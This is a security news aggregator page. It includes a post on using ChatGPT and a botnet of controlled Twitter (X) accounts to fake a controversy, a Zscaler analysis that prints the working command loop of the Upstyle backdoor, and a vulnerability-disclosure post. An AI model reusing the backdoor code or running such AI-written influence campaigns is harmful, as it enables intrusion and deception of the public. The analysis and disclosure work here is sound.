News feed aggregator

How to create a Controversy Campaign on Twitter (X) with ChatGPT and a botnet of controlled accounts #Tistimito

Un informático en el lado del mal - 1 hour 59 mins ago
Last Thursday I went with Carmen Porter and Iker Jiménez to the Horizonte programme to explain something that those of us who work in cybersecurity, online reputation, or the protection of personal and professional brands on social networks have known since social networks began: the opinion wars waged by bots on those platforms, and on any other Internet service, to put pressure on a person or a company and achieve a goal.
Figure 1: How to create a Controversy Campaign on Twitter (X) with ChatGPT and a botnet of controlled accounts #Tistimito
The idea is as simple as controlling a large number of accounts on a platform, whether Twitter (X), Instagram, Google (to sign in with the Google account on all of them or to post comments anywhere), Facebook, or "pick-the-platform-or-network-where-you-want-to-run-your-campaign", and then using a control panel to make those accounts do things automatically and en masse. We have seen this used for many malicious purposes, such as BlackSEO, BlackASO campaigns, and of course the generation of "flames" on social networks.
Figure 2: "Ciberestafas: La historia de nunca acabar" by Juan Carlos Galindo, at 0xWord
Online reputation professionals know well how these networks of controlled accounts work: they are used to run positive support campaigns or negative campaigns, and in the world of cyber scams they are a key piece for lending realism to the deceptions presented to victims.
Figure 3: Fake comments posted by controlled accounts on YouTube to promote Linda's contact details and run scams via WhatsApp or Telegram
The way it works is simple: a C&C control panel manages the accounts and issues them orders, like the botnet they are. These accounts then carry out the actions on whatever platform is targeted, whether comments on YouTube - as in the "Linda Fake Broker" example I shared - posts on Twitter (X), or reviews of an app on the App Store or Google Play for a BlackASO campaign, or anything else.
NewsBender: create your own controversy on Twitter (X)
To control those accounts, they first have to exist - created either by the owner of the C&C or by a real person - and then be brought under control. To manage them, that is, to have them "control"-"led", you need either their credentials or simply an OAuth token. In both cases, control can be obtained legitimately or through theft of credentials or OAuth tokens, using many of the techniques I have described on more than a few occasions, such as our Sappo.
Figure 5: Tool for creating controversies on Twitter (X)
In the case of Twitter (X), which is what we prepared for the Horizonte programme, we built a tool that did exactly that, but to make it easier and clearer for viewers we used ChatGPT, in this case GPT-3.5, to generate the messages itself, with one percentage of positive messages and another of negative ones. I had already discussed this idea in Codeproject: Newsbender, about automatically creating politically slanted news stories for digital newspapers.
In our case, the tool lets you choose a topic, specify the target of the campaign, whether it should be positive, negative, very positive or very negative, and how many messages ChatGPT should generate; the messages are then published through the Twitter (X) accounts held in our C&C. For this demo we used only 20 Twitter (X) accounts, created specially for the occasion and lightly profiled with profile photos, posts, followers and a bit of interaction history.
Figure 6: Messages created by the tool, assigned to test Twitter accounts
Next, we built a control panel from which you configure the type of prompting - you can see it in Figure 5 - sent to ChatGPT so that the campaigns are for or against, and the level of intensity, letting the GPT model produce harsher or softer messages. The tool also lets you add hashtags, or have the model generate them automatically, either to give the model free rein or to have a tag to follow when analysing the impact of the campaign.
Figure 7: Demo of how the process works
To make the "flame" more realistic, you can configure the total number of posts (tweets) to be created and the percentage of them that will oppose the campaign, so that there is debate and more engagement with the human Twitter (X) community. The end goal is to start a large fire in three phases:
  1. The bots light the spark, generating the initial noise, polemical debate included, to create a pull effect on humans.
  2. The human accounts drawn to the controversy take sides and keep spreading the fire across the network.
  3. The fire jumps from the network to digital media, via outlets that turn whatever happens on the network into news.
So, on the programme, which you can watch in full on the web, we used the tool to create several controversies, one of them against Iker Jiménez for having botched an interview with a fictitious guest I named Tistimito.
Figure 8: Creating the controversy campaigns on Twitter (X)
The result: the posts (tweets) were created automatically by ChatGPT, assigned, all with the same hashtag, to different Twitter (X) accounts controlled by the C&C, and then published to the network with a single button. You can see what happened on the programme from minute 33:40.
Figure 9: Controversies on Twitter (X), from minute 33:40
After that, people see the messages on the social network, join the debate and fan the flames, and the rest is a Trending Topic that carries the fire to digital media, newspapers and news programmes, and even puts pressure on executives and politicians to achieve specific goals.
Figure 10: Tistimito is trending in Spain
None of this is new; it has been going on for many years. The point was to show how easy it has become with the arrival of LLMs and GenAI, where creating the text messages, the comments, and so on is just a prompting game.
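The post mentions fixing a hashtag precisely so the impact of a campaign can be measured afterwards. Purely as an illustration of that measurement side, and not of the content-generation or posting side, a minimal sketch could bucket posts per hour from an exported data set; the CSV file name and column names below are assumptions, not part of the tool described above.

import csv
from collections import Counter
from datetime import datetime

def posts_per_hour(csv_path: str, hashtag: str) -> Counter:
    """Count posts containing a hashtag, bucketed by hour, from a CSV export
    assumed to have 'created_at' (ISO 8601) and 'text' columns."""
    buckets = Counter()
    with open(csv_path, newline="", encoding="utf-8") as fh:
        for row in csv.DictReader(fh):
            if hashtag.lower() in row.get("text", "").lower():
                ts = datetime.fromisoformat(row["created_at"])
                buckets[ts.strftime("%Y-%m-%d %H:00")] += 1
    return buckets

# A sudden spike from a near-zero baseline is the signature of the "bots light the spark" phase.
for hour, count in sorted(posts_per_hour("tistimito_posts.csv", "#Tistimito").items()):
    print(hour, count)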
¡Saludos Malignos!
Author: Chema Alonso (Contact Chema Alonso)


Categories: Security Posts

AI-Controlled Fighter Jets Are Dogfighting With Human Pilots Now

Wired: Security - 3 hours 44 secs ago
Plus: New York’s legislature suffers a cyberattack, police disrupt a global phishing operation, and Apple removes encrypted messaging apps in China.
Categories: Security Posts

The CVE's They are A-Changing!, (Wed, Apr 17th)

SANS Internet Storm Center, InfoCON: green - Fri, 2024/04/19 - 20:12
The downloadable format of CVEs from MITRE will be changing in June 2024, so if you are using CVE downloads to populate your scanner or SIEM, or to feed a SOC process, now would be a good time to look at that. If you are a vendor and use these downloads to populate your own feeds or product database, and you're not using the new format already, you might be behind the eight ball! The old format (CVE JSON 4.0) is being replaced by CVE JSON 5.0; full details can be found here:
https://www.cve.org/Media/News/item/blog/2023/03/29/CVE-Downloads-in-JSON-5-Format
You can play with the actual files here: https://github.com/CVEProject/cvelistV5 (p.s. the earworm is free!)
===============
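If you are updating an ingestion pipeline, a minimal sketch of reading one record in the new format might look like the following. It assumes the directory layout of the cvelistV5 repository linked above and uses defensive lookups, since optional fields such as CVSS metrics vary between records; check the field names against the published JSON 5.x schema before relying on them.

import json
from pathlib import Path

def summarize_cve_record(path: Path) -> dict:
    """Extract a few common fields from a CVE JSON 5.x record (cvelistV5 layout)."""
    record = json.loads(path.read_text(encoding="utf-8"))
    meta = record.get("cveMetadata", {})
    cna = record.get("containers", {}).get("cna", {})
    description = next(
        (d.get("value") for d in cna.get("descriptions", []) if d.get("lang", "").startswith("en")),
        "",
    )
    # Not every record carries CVSS metrics, and key names differ by CVSS version.
    score = None
    for metric in cna.get("metrics", []):
        cvss = metric.get("cvssV3_1") or metric.get("cvssV3_0") or {}
        score = cvss.get("baseScore", score)
    return {"id": meta.get("cveId"), "state": meta.get("state"), "score": score, "description": description}

if __name__ == "__main__":
    # Example path after cloning https://github.com/CVEProject/cvelistV5
    print(summarize_cve_record(Path("cves/2024/3xxx/CVE-2024-3400.json")))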
Rob VandenBrink
rob@coherentsecurity.com (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security Posts

The Biggest Deepfake Porn Website Is Now Blocked in the UK

Wired: Security - Fri, 2024/04/19 - 18:54
The world's most-visited deepfake website and another large competing site are stopping people in the UK from accessing them, days after the UK government announced a crackdown.
Categories: Security Posts

Microsoft’s VASA-1 can deepfake a person with one photo and one audio track

ArsTechnica: Security Content - Fri, 2024/04/19 - 15:07
Figure: A sample image from Microsoft for "VASA-1: Lifelike Audio-Driven Talking Faces Generated in Real Time." (credit: Microsoft)
On Tuesday, Microsoft Research Asia unveiled VASA-1, an AI model that can create a synchronized animated video of a person talking or singing from a single photo and an existing audio track. In the future, it could power virtual avatars that render locally and don't require video feeds—or allow anyone with similar tools to take a photo of a person found online and make them appear to say whatever they want.
"It paves the way for real-time engagements with lifelike avatars that emulate human conversational behaviors," reads the abstract of the accompanying research paper titled "VASA-1: Lifelike Audio-Driven Talking Faces Generated in Real Time." It's the work of Sicheng Xu, Guojun Chen, Yu-Xiao Guo, Jiaolong Yang, Chong Li, Zhenyu Zang, Yizhong Zhang, Xin Tong, and Baining Guo.
The VASA framework (short for "Visual Affective Skills Animator") uses machine learning to analyze a static image along with a speech audio clip. It is then able to generate a realistic video with precise facial expressions, head movements, and lip-syncing to the audio. It does not clone or simulate voices (like other Microsoft research) but relies on an existing audio input that could be specially recorded or spoken for a particular purpose.
Categories: Security Posts

A Look at CVE-2024-3400 Activity and Upstyle Backdoor Technical Analysis

Zscaler Research - Thu, 2024/04/18 - 03:11
Introduction
Recently, a zero-day command-injection vulnerability, assigned to CVE-2024-3400, was found in the Palo Alto Networks PAN-OS. It was assigned the maximum severity score of 10.0 and can be exploited by an unauthenticated user to run arbitrary commands on the target system with root privileges. Volexity was the first to identify and report the vulnerability. Since then, the Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2024-3400 to its Known Exploited Vulnerability Catalog. In this blog, we will share the vulnerability exploitation activity observed by Zscaler's global intelligence network, and we will examine the recently discovered Python-based backdoor and its novel interaction mechanism with the operator.
Key Takeaways
  • Zscaler's global intelligence network picked up CVE-2024-3400 activity right after the exploitation script was released.
  • The backdoor utilizes a .pth file for auto-execution and employs a novel indirect interaction with the operator: commands are sent via error logs and the output is retrieved through a publicly accessible stylesheet.
  • On the same day the vulnerability was publicly disclosed, a Python-based exploitation script was also released to the public on GitHub, making it easier for other cyber criminals to exploit or test appliances for this vulnerability.
Activity Observed by Zscaler
Zscaler's global intelligence network picked up activity from various known malicious sources targeting appliances across multiple customers. This activity was picked up almost immediately after the publication of the exploitation script on GitHub. The activity does not appear to target any particular region or industry vertical. Most of the activity observed originated from malicious IPs already known to be associated with vulnerability scanning, Redline Stealer, and EvilProxy. However, one IP stands out from this group. We believe the IP address 67.55.94[.]84 is associated with a VPN provider. No other activity from this IP has been observed. Currently, there is insufficient evidence to attribute this IP to any specific threat actor.
Technical Analysis
We suspect the attackers intended to incorporate Upstyle in their attack sequence. Upstyle, a sophisticated backdoor initially identified by Volexity, employs innovative techniques for persistence, command reception, and output sharing with the operator.
Attack flow
The figure below shows how the attack flow would unfold.
Figure 1: The possible firewall-based attack chain enabled by the PAN-OS zero-day vulnerability.
Upstyle backdoor
The backdoor consists of three layers. The first, outer layer is the installer, which contains the next layer in a base64-encoded format.
Layer 1 - Installer
The installer layer writes the next layer to the following path: /usr/lib/python3.6/site-packages/system.pth. Additionally, it sets the last access time and last modified time of the system.pth file to the same respective times as the installer script. Finally, the installer script deletes itself and the /opt/pancfg/mgmt/licenses/PA_VM`* file. The file path and the extension have special significance. Since the release of Python 3.5, any .pth file under site-packages is run at every Python startup, and the lines starting with import (followed by a space or tab) are executed, thereby setting up a unique auto-execution mechanism for the malicious code whenever any Python code is run on the system.
Layer 2 - Launcher
This layer contains the functional backdoor as another base64-encoded blob of code. It contains two functions named protect and check.
  • protect: This function likely protects the persistence mechanism and makes sure the backdoor stays in the system.pth file. It reads the contents of system.pth and adds a handler for the termination signal. The handler will write back the contents of the system.pth file before terminating.
  • check: This method is called after the protect method. It checks whether it is running as /usr/local/bin/monitor mp by inspecting the file /proc/self/cmdline. If it is, the backdoor code is executed. This could be a way to control the execution of the backdoor and avoid running multiple duplicates of the backdoor thread.
Layer 3 - Backdoor
On start, this backdoor reads the content, last access time, and last modified time of the file /var/appweb/sslvpndocs/global-protect/portal/css/bootstrap.min.css so they can be restored later. Then it goes into an infinite loop and starts monitoring the error log file at /var/log/pan/sslvpn_ngx_error.log, looking for one of the following regular expressions: img\[([a-zA-Z0-9+/=]+)\] or img\{base64encoded_command}\. When a matching line is found, the command is base64-decoded, executed, and the output is appended to the bootstrap.min.css file inside comment tags, /* {command output here} */. Finally, the log file is purged of the attacker's generated error logs containing the malicious commands, and the error-log-file timestamps are restored. After 15 seconds the content and timestamps of the bootstrap.min.css file are also restored.

-- [snip] --
css_path = '/var/appweb/sslvpndocs/global-protect/portal/css/bootstrap.min.css'
content = open(css_path).read()
atime=os.path.getatime(css_path)
mtime=os.path.getmtime(css_path)
while True:
    try:
        SHELL_PATTERN = 'img\[([a-zA-Z0-9+/=]+)\]'
        lines = []
        WRITE_FLAG = False
        for line in open("/var/log/pan/sslvpn_ngx_error.log",errors="ignore").readlines():
            rst = re.search(SHELL_PATTERN,line)
            if rst:
                WRITE_FLAG = True
                cmd = base64.b64decode(rst.group(1)).decode()
                try:
                    output = os.popen(cmd).read()
                    with open(css_path,"a") as f:
                        f.write("/*"+output+"*/")
                except Exception as e:
                    pass
                continue
            lines.append(line)
        if WRITE_FLAG:
            atime=os.path.getatime("/var/log/pan/sslvpn_ngx_error.log")
            mtime=os.path.getmtime("/var/log/pan/sslvpn_ngx_error.log")
            with open("/var/log/pan/sslvpn_ngx_error.log","w") as f:
                f.writelines(lines)
            os.utime("/var/log/pan/sslvpn_ngx_error.log",(atime,mtime))
            import threading
            threading.Thread(target=restore,args=(css_path,content,atime,mtime)).start()
    except:
        pass
    time.sleep(2)
-- [snip] --

Conclusion
CVE-2024-3400 is a highly severe vulnerability. There was an uptick in malicious activity soon after the exploitation script was released to the public on GitHub. The founding principles of the Zero Trust Exchange Platform™, a zero trust architecture, and defense in depth should be used in combination to defend against such attacks. In addition to deploying detection rules and monitoring for suspicious activity in environments, security teams should also adopt Deception Engineering. Strategic use of this technology can make it impossible for the adversary to move in the environment without tripping alerts.

Indicators Of Compromise (IOCs)
Vulnerability scan originating IPs:
IP               Comment
23.227.194.230   Known Malicious IP
154.88.26.223    Known Malicious IP
206.189.14.205   Known Malicious IP
67.55.94.84      SaferVPN IP

SHA256 Hashes:
ab3b9ec7bdd2e65051076d396d0ce76c1b4d6f3f00807fa776017de88bebd2f3
3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac
949cfa6514e499e28aa32feba800181558e60455b971206aa5aa601ea1f55605
710f67d0561c659aecc56b94ee3fc82c967a9647c08451ed35ffa757020167fb
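The persistence trick described above abuses documented Python behaviour: any .pth file under site-packages whose lines start with "import" is executed at interpreter startup. As a purely illustrative triage aid (not an Upstyle-specific detection, and assuming a standard CPython layout rather than the appliance paths shown above), a responder could enumerate those auto-executed lines for manual review:

import site
from pathlib import Path

def list_executable_pth_lines():
    """Print every .pth line that Python would execute at startup (lines starting with 'import')."""
    roots = set()
    try:
        roots.update(site.getsitepackages())
    except AttributeError:
        # Some embedded or virtualenv interpreters do not expose getsitepackages().
        pass
    try:
        roots.add(site.getusersitepackages())
    except AttributeError:
        pass
    for root in sorted(roots):
        for pth in Path(root).glob("*.pth"):
            for lineno, line in enumerate(pth.read_text(errors="ignore").splitlines(), start=1):
                if line.startswith(("import ", "import\t")):
                    print(f"{pth}:{lineno}: {line.strip()}")

if __name__ == "__main__":
    list_executable_pth_lines()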
Categories: Security Posts

Introduction to Software Composition Analysis and How to Select an SCA Tool

AlienVault Blogs - Wed, 2024/04/17 - 12:00
The content of this post is solely the responsibility of the author.  AT&T does not adopt or endorse any of the views, positions, or information provided by the author in this article.  Software code is constantly growing and becoming more complex, and there is a worrying trend: an increasing number of open-source components are vulnerable to attacks. A notable instance was the Apache Log4j library vulnerability, which posed serious security risks. And this is not an isolated incident. Using open-source software necessitates thorough Software Composition Analysis (SCA) to identify these security threats. Organizations must integrate SCA tools into their development workflows while also being mindful of their limitations. Why SCA Is Important Open-source components have become crucial to software development across various industries. They are fundamental to the construction of modern applications, with estimates suggesting that up to 96% of the total code bases contain open-source elements. Assembling applications from diverse open-source blocks presents a challenge, necessitating robust protection strategies to manage and mitigate risks effectively. Software Composition Analysis is the process of identifying and verifying the security of components within software, especially open-source ones. It enables development teams to efficiently track, analyze, and manage any open-source element integrated into their projects. SCA tools identify all related components, including libraries and their direct and indirect dependencies. They also detect software licenses, outdated dependencies, vulnerabilities, and potential exploits. Through scanning, SCA creates a comprehensive inventory of a project's software assets, offering a full view of the software composition for better security and compliance management. Although SCA tools have been available for quite some time, the recent open-source usage surge has cemented their importance in application security. Modern software development methodologies, such as DevSecOps, emphasize the need for SCA solutions for developers. The role of security officers is to guide and assist developers in maintaining security across the Software Development Life Cycle (SDLC), ensuring that SCA becomes an integral part of creating secure software. Objectives and Tasks of SCA Tools Software Composition Analysis broadly refers to security methodologies and tools designed to scan applications, typically during development, to identify vulnerabilities and software license issues. For effective management of open-source components and associated risks, SCA solutions help navigate several tasks: 1) Increasing Transparency A developer might incorporate various open-source packages into their code, which in turn may depend on additional open-source packages unknown to the developer. These indirect dependencies can extend several levels deep, complicating the understanding of exactly which open-source code the application uses. Reports indicate that 86% of vulnerabilities in node.js projects stem from transitive (indirect) dependencies, with similar statistics in the Java and Python ecosystems. This suggests that most security vulnerabilities in applications often originate from open-source code that developers might not even be aware of. For cloud applications, open-source components in container images can also pose transparency challenges, requiring identification and vulnerability scanning. 
While the abstraction containers offer to programmers is beneficial for development, it simultaneously poses a security risk, as it can obscure the details of the underlying components. 2) Grasping the Logic of Dependencies Accurately identifying dependencies - and the vulnerabilities they introduce - demands a comprehensive understanding of each ecosystem's unique handling of them. It is crucial for an SCA solution to recognize these nuances and avoid generating false positives. 3) Prioritizing Vulnerabilities Due to the limited resources at the disposal of developers and security professionals, prioritizing vulnerabilities becomes a significant challenge without the required data and knowledge. While the Common Vulnerability Scoring System (CVSS) offers a method for assessing vulnerabilities, its shortcomings make it somewhat challenging to apply effectively. The main issues with CVSS stem from the variance in environments, including how they are operated, designed, and put together. Additionally, CVSS scores do not consider the age of a vulnerability or its involvement in exploit chains, further complicating their usage. 4) Building an Updated, Unified Vulnerability Database A vast array of analytical data on vulnerabilities is spread out over numerous sources, including national databases, online forums, and specialized security publications. However, there is often a delay in updating these sources with the latest vulnerability information. This delay in reporting can be critically detrimental. SCA tools help address this issue by aggregating and centralizing vulnerability data from a wide range of sources. 5) Speeding Up Secure Software Development Before the code progresses in the release process, it must undergo a security review. If the services tasked with checking for vulnerabilities do not do so swiftly, this can slow down the entire process. The use of AI test automation tools offers a solution to this issue. They enable the synchronization of development and vulnerability scanning processes, preventing unforeseen delays. The challenges mentioned above have spurred the development of the DevSecOps concept and the "Shift Left" approach, which places the responsibility for security directly on development teams. Guided by this principle, SCA solutions enable the verification of the security of open-source components early in the development process, ensuring that security considerations are integrated from the outset. Important Aspects of Choosing and Using SCA Tools Software Composition Analysis systems have been in existence for over a decade. However, the increasing reliance on open-source code and the evolving nature of application assembly, which now involves numerous components, have led to the introduction of various types of solutions. SCA solutions range from open-source scanners to specialized commercial tools, as well as comprehensive application security platforms. Additionally, some software development and maintenance solutions now include basic SCA features. When selecting an SCA system, it is helpful to evaluate the following capabilities and parameters: ● Developer-Centric Convenience Gone are the days when security teams would simply pass a list of vulnerabilities to developers to address. DevSecOps mandates a greater level of security responsibility on developers, but this shift will not be effective if the tools at their disposal are counterproductive. An SCA tool that is challenging to use or integrate will hardly be beneficial. 
Therefore, when selecting an SCA tool, make sure it can: - Be intuitive and straightforward to set up and use - Easily integrate with existing workflows - Automatically offer practical recommendations for addressing issues ● Harmonizing Integration in the Ecosystem An SCA tool's effectiveness is diminished if it cannot accommodate the programming languages used to develop your applications or fit seamlessly into your development environment. While some SCA solutions might offer comprehensive language support, they might lack, for example, a plugin for Jenkins, which would allow for the straightforward inclusion of application security testing within the build process or modules for the Integrated Development Environment (IDE). ● Examining Dependencies Since many vulnerabilities are tied to dependencies, whose exploitation can often only be speculated, it is important when assessing an SCA tool to verify that it can accurately understand all the application's dependencies. This ensures those in charge have a comprehensive view of the security landscape. It would be good if your SCA tool could also provide a visualization of dependencies to understand the structure and risks better. ● Identifying Vulnerabilities An SCA tool's ability to identify vulnerabilities in open-source packages crucially depends on the quality of the security data it uses. This is the main area where SCA tools differ significantly. Some tools may rely exclusively on publicly available databases, while others aggregate data from multiple proprietary sources into a continuously updated and enriched database, employing advanced analytical processes. Even then, nuances in the database's quality and the accuracy and comprehensiveness of its intelligence can vary, impacting the tool's effectiveness. ● Prioritizing Vulnerabilities SCA tools find hundreds or thousands of vulnerabilities, a volume that can swiftly become unmanageable for a team. Given that it is practically unfeasible to fix every single vulnerability, it is vital to strategize which fixes will yield the most significant benefit. A poor prioritization mechanism, particularly one that leads to an SCA tool frequently triggering false positives, can create unnecessary friction and diminish developers' trust in the process. ● Fixing Vulnerabilities Some SCA tools not only detect vulnerabilities but also proceed to the logical next step of patching them. The range of these patching capabilities can differ significantly from one tool to another, and this variability extends to the recommendations provided. It is one matter to suggest upgrading to a version that resolves a specific vulnerability; it is quite another to determine the minimal update path to prevent disruptions. For example, some tools might automatically generate a patch request when a new vulnerability with a recommended fix is identified, showcasing the advanced and proactive features that differentiate these tools in their approach to securing applications. ● Executing Oversight and Direction It is essential to choose an SCA tool that offers the controls necessary for managing the use of open-source code within your applications effectively. The ideal SCA tool should come equipped with policies that allow for detailed fine-tuning, enabling you to granularly define and automatically apply your organization's specific security and compliance standards. ● Reports   Tracking various open-source packages over time, including their licenses, serves important purposes for different stakeholders. 
Security teams, for example, may want to evaluate the effectiveness of SCA processes by monitoring the number and remediation of identified vulnerabilities. Meanwhile, legal departments might focus on compiling an inventory of all dependencies and licenses to ensure the organization's adherence to compliance and regulatory requirements. Your selected SCA tool should be capable of providing flexible and detailed reporting to cater to the diverse needs of stakeholders. ● Automation and Scalability Manual tasks associated with SCA processes often become increasingly challenging in larger development environments. Automating tasks like adding new projects and users for testing or scanning new builds within CI/CD pipelines not only enhances efficiency but also helps avoid conflicts with existing workflows. Modern SCA tools should use machine learning for improved accuracy and data quality. Another critical factor to consider is the availability of a robust API, which enables deeper integration. Moreover, the potential for interaction with related systems, such as Security Orchestration, Automation, and Response (SOAR) and Security Information and Event Management (SIEM), in accessing information on security incidents, is also noteworthy. ● Application Component Management Modern applications consist of numerous components, each requiring scanning and protection. A modern SCA tool should be able to scan container images for vulnerabilities and seamlessly integrate into the workflows, tools, and systems used for building, testing, and running these images. Advanced solutions may also offer remedies for identified flaws in containers. Conclusion Every organization has unique requirements influenced by factors like technology stack, use case, budget, and security priorities. There is no one-size-fits-all solution for Software Composition Analysis. However, by carefully evaluating the features, capabilities, and integration options of various SCA tools, organizations can select a solution that best aligns with their specific needs and enhances their overall security posture. The chosen SCA tool should accurately identify all open-source components, along with their associated vulnerabilities and licenses.
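As a concrete illustration of the automation point above, the hedged sketch below wires a basic dependency audit into a CI step by shelling out to npm audit --json and failing the build above a severity threshold. It is not a substitute for a full SCA tool, and the exact JSON layout produced by npm audit differs between npm versions, so treat the field names as assumptions to verify.

import json
import subprocess
import sys

# Severity levels that should fail the pipeline (adjust to your policy).
FAIL_ON = {"high", "critical"}

def run_npm_audit() -> dict:
    """Run 'npm audit --json' in the current project and return the parsed report."""
    proc = subprocess.run(["npm", "audit", "--json"], capture_output=True, text=True)
    # npm exits non-zero when vulnerabilities are found, so don't treat that as an error.
    return json.loads(proc.stdout or "{}")

def main() -> int:
    report = run_npm_audit()
    # The summary block location varies across npm versions; adjust if needed.
    summary = report.get("metadata", {}).get("vulnerabilities", {})
    bad = {sev: count for sev, count in summary.items() if sev in FAIL_ON and count}
    print("vulnerability summary:", summary or "none reported")
    if bad:
        print("failing build due to:", bad)
        return 1
    return 0

if __name__ == "__main__":
    sys.exit(main())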
Categories: Security Posts

5 reasons to strive for better disclosure processes

By Max Ammann This blog showcases five examples of real-world vulnerabilities that we’ve disclosed in the past year (but have not publicly disclosed before). We also share the frustrations we faced in disclosing them to illustrate the need for effective disclosure processes. Here are the five bugs: Discovering a vulnerability in an open-source project necessitates a careful approach, as publicly reporting it (also known as full disclosure) can alert attackers before a fix is ready. Coordinated vulnerability disclosure (CVD) uses a safer, structured reporting framework to minimize risks. Our five example cases demonstrate how the lack of a CVD process unnecessarily complicated reporting these bugs and ensuring their remediation in a timely manner. In the Takeaways section, we show you how to set up your project for success by providing a basic security policy you can use and walking you through a streamlined disclosure process called GitHub private reporting. GitHub’s feature has several benefits:
  • Discreet and secure alerts to developers: no need for PGP-encrypted emails
  • Streamlined process: no playing hide-and-seek with company email addresses
  • Simple CVE issuance: no need to file a CVE form at MITRE
Time for action: If you own well-known projects on GitHub, use private reporting today! Read more on Configuring private vulnerability reporting for a repository, or skip to the Takeaways section of this post. Case 1: Undefined behavior in borsh-rs Rust library The first case, and reason for implementing a thorough security policy, concerned a bug in a cryptographic serialization library called borsh-rs that was not fixed for two years. During an audit, I discovered unsafe Rust code that could cause undefined behavior if used with zero-sized types that don’t implement the Copy trait. Even though somebody else reported this bug previously, it was left unfixed because it was unclear to the developers how to avoid the undefined behavior in the code and keep the same properties (e.g., resistance against a DoS attack). During that time, the library’s users were not informed about the bug. The whole process could have been streamlined using GitHub’s private reporting feature. If project developers cannot address a vulnerability when it is reported privately, they can still notify Dependabot users about it with a single click. Releasing an actual fix is optional when reporting vulnerabilities privately on GitHub. I reached out to the borsh-rs developers about notifying users while there was no fix available. The developers decided that it was best to notify users because only certain uses of the library caused undefined behavior. We filed the notification RUSTSEC-2023-0033, which created a GitHub advisory. A few months later, the developers fixed the bug, and the major release 1.0.0 was published. I then updated the RustSec advisory to reflect that it was fixed. The following code contained the bug that caused undefined behavior: impl<T> BorshDeserialize for Vec<T> where T: BorshDeserialize, { #[inline] fn deserialize<R: Read>(reader: &mut R) -> Result<Self, Error> { let len = u32::deserialize(reader)?; if size_of::<T>() == 0 { let mut result = Vec::new(); result.push(T::deserialize(reader)?); let p = result.as_mut_ptr(); unsafe { forget(result); let len = len as usize; let result = Vec::from_raw_parts(p, len, len); Ok(result) } } else { // TODO(16): return capacity allocation when we can safely do that. let mut result = Vec::with_capacity(hint::cautious::<T>(len)); for _ in 0..len { result.push(T::deserialize(reader)?); } Ok(result) } } } Figure 1: Use of unsafe Rust (borsh-rs/borsh-rs/borsh/src/de/mod.rs#123–150) The code in figure 1 deserializes bytes to a vector of some generic data type T. If the type T is a zero-sized type, then unsafe Rust code is executed. The code first reads the requested length for the vector as u32. After that, the code allocates an empty Vec type. Then it pushes a single instance of T into it. Later, it temporarily leaks the memory of the just-allocated Vec by calling the forget function and reconstructs it by setting the length and capacity of Vec to the requested length. As a result, the unsafe Rust code assumes that T is copyable. The unsafe Rust code protects against a DoS attack where the deserialized in-memory representation is significantly larger than the serialized on-disk representation. The attack works by setting the vector length to a large number and using zero-sized types. An instance of this bug is described in our blog post Billion times emptiness. 
Case 2: DoS vector in Rust libraries for parsing the Ethereum ABI
In July, I disclosed multiple DoS vulnerabilities in four Ethereum ABI-parsing libraries, which were difficult to report because I had to reach out to multiple parties. The bug affected four GitHub-hosted projects. Only the Python project eth_abi had GitHub private reporting enabled. For the other three projects (ethabi, alloy-rs, and ethereumjs-abi), I had to research who was maintaining them, which can be error-prone. For instance, I had to resort to the trick of getting email addresses from maintainers by appending the suffix .patch to GitHub commit URLs. The following link shows the non-work email address I used for committing: https://github.com/trailofbits/publications/commit/a2ab5a1cab59b52c4fa71b40dae1f597bc063bdf.patch
In summary, as the group of affected vendors grows, the burden on the reporter grows as well. Because you typically need to synchronize between vendors, the effort does not grow linearly but exponentially. Having more projects use the GitHub private reporting feature, a security policy with contact information, or simply an email in the README file would streamline communication and reduce effort. Read more about the technical details of this bug in the blog post Billion times emptiness. Case 3: Missing limit on authentication tag length in Expo In late 2022, Joop van de Pol, a security engineer at Trail of Bits, discovered a cryptographic vulnerability in expo-secure-store. In this case, the vendor, Expo, failed to follow up with us about whether they acknowledged or had fixed the bug, which left us in the dark. Even worse, trying to follow up with the vendor consumed a lot of time that could have been spent finding more bugs in open-source software. When we initially emailed Expo about the vulnerability through the email address listed on its GitHub, secure@expo.io, an Expo employee responded within one day and confirmed that they would forward the report to their technical team. However, after that response, we never heard back from Expo despite two gentle reminders over the course of a year. Unfortunately, Expo did not allow private reporting through GitHub, so the email was the only contact address we had. Now to the specifics of the bug: on Android above API level 23, SecureStore uses AES-GCM keys from the KeyStore to encrypt stored values. During encryption, the tag length and initialization vector (IV) are generated by the underlying Java crypto library as part of the Cipher class and are stored with the ciphertext: /* package */ JSONObject createEncryptedItem(Promise promise, String plaintextValue, Cipher cipher, GCMParameterSpec gcmSpec, PostEncryptionCallback postEncryptionCallback) throws GeneralSecurityException, JSONException { byte[] plaintextBytes = plaintextValue.getBytes(StandardCharsets.UTF_8); byte[] ciphertextBytes = cipher.doFinal(plaintextBytes); String ciphertext = Base64.encodeToString(ciphertextBytes, Base64.NO_WRAP); String ivString = Base64.encodeToString(gcmSpec.getIV(), Base64.NO_WRAP); int authenticationTagLength = gcmSpec.getTLen(); JSONObject result = new JSONObject() .put(CIPHERTEXT_PROPERTY, ciphertext) .put(IV_PROPERTY, ivString) .put(GCM_AUTHENTICATION_TAG_LENGTH_PROPERTY, authenticationTagLength); postEncryptionCallback.run(promise, result); return result; } Figure 2: Code for encrypting an item in the store, where the tag length is stored next to the cipher text (SecureStoreModule.java) For decryption, the ciphertext, tag length, and IV are read and then decrypted using the AES-GCM key from the KeyStore. An attacker with access to the storage can change an existing AES-GCM ciphertext to have a shorter authentication tag. Depending on the underlying Java cryptographic service provider implementation, the minimum tag length is 32 bits in the best case (this is the minimum allowed by the NIST specification), but it could be even lower (e.g., 8 bits or even 1 bit) in the worst case. So in the best case, the attacker has a small but non-negligible probability that the same tag will be accepted for a modified ciphertext, but in the worst case, this probability can be substantial. In either case, the success probability grows depending on the number of ciphertext blocks. 
